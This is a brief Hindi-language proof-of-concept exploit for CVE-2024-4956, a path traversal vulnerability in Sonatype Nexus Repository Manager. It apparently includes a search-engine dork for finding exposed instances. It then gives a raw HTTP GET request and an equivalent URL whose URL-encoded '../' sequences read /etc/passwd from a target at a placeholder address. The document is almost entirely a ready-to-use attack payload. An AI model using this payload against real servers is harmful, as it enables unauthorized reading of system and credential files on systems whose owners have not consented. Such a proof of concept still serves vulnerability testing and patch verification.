
CVE-2024-4956 के लिए प्रमाण-अवधारणा शोषण, Sonatype Nexus Repository Manager में एक पथ ट्रैवर्सल भेद्यता, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से अनधिकृत फ़ाइल पढ़ने में सक्षम बनाता है।
title="Nexus रिपॉजिटरी मैनेजर"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip
http://x.x.x.x/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
